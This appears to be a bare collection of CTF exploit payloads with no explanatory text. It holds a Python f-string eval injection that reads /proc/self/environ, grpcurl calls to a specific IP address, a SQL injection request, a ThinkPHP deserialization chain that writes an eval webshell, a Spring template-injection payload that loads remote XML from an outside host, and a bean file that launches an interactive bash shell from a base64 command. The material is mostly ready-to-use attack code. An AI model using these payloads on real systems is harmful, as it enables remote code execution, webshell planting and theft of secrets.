input_code = ''input_code = eval(f"f'{input_code}'")

{int(open("/proc/self/environ").read())}

grpcurl -d '{"name":"test"}' -plaintext 8.147.135.51:42664  helloworld.Greeter.SayHello

grpcurl -d '{"serializeData": "ZmZha2xnamtsYW5na2E="}'  -plaintext 8.147.135.51:42664 helloworld.Greeter.ProcessMsg

    'app_debug'              => true,

            $sql = rtrim($sql, ', ') . " WHERE `id` = " . intval($id);            var_dump($sql);            return mysqli_query($this->connect(), $sql);

id=3&name=test&price=100.00&on_sale_time=2023-12-19T11%3A11&image=test&data=1&data`%3D'qqq'where`id`%3D3%23=test

<?phpnamespace think\process\pipes;class Windows{    private $files = [];    public function __construct(){        $this->files = [new \think\model\Merge];    }} namespace think\model;use think\Model; class Merge extends Model{    protected $append = [];    protected $error;     public function __construct(){        $this->append = [            'bb' => 'getError'        ];        $this->error = (new \think\model\relation\BelongsTo);    }}namespace think;class Model{} namespace think\console;class Output{    protected $styles = [];    private $handle = null;    public function __construct(){        $this->styles = ['removeWhereField'];        $this->handle = (new \think\session\driver\Memcache);    }} namespace think\model\relation;class BelongsTo{    protected $query;    public function __construct(){        $this->query = (new \think\console\Output);    }} namespace think\session\driver;class Memcache{    protected $handler = null;    public function __construct(){        $this->handler = (new \think\cache\driver\Memcached);    }}namespace think\cache\driver;class File{    protected $tag;    protected $options = [];    public function __construct(){        $this->tag = false;        $this->options = [            'expire'        => 3600,            'cache_subdir'  => false,            'prefix'        => '',            'data_compress' => false,            'path'          => 'php://filter/convert.base64-decode/resource=./',        ];    }} class Memcached{    protected $tag;    protected $options = [];    protected $handler = null;     public function __construct(){        $this->tag = true;        $this->options = [            'expire'   => 0,            'prefix'   => 'PD9waHAKZXZhbCgkX0dFVFsnYSddKTsKPz4',        ];        $this->handler = (new File);    }}
$a = ['a'   => new \think\process\pipes\Windows(),];echo base64_encode(serialize($a));

{% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %}{% set yy =  beans.get("jacksonObjectMapper").readValue("{}", y) %}{% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %}{{ yyy.setConfigLocation("http://xxx.xxx.xxx/1.xml") }}{{ yyy.refresh() }}

org.springframework.context.support.ClassPathXmlApplicationContextorg.springframework.context.support.FileSystemXmlApplicationContext

{% set yyy = yy.instantiate(null,"org.springframework.context.support.Class"+"PathXmlApplicationContext") %}

<?xml version="1.0" encoding="UTF-8" ?>    <beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"       xsi:schemaLocation="     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">            <constructor-arg >            <list>                <value>bash</value>                <value>-c</value>        <value>{echo,YmFzaCxxxxxxxx}|{base64,-d}|{bash,-i}</value>            </list>            </constructor-arg>        </bean>    </beans>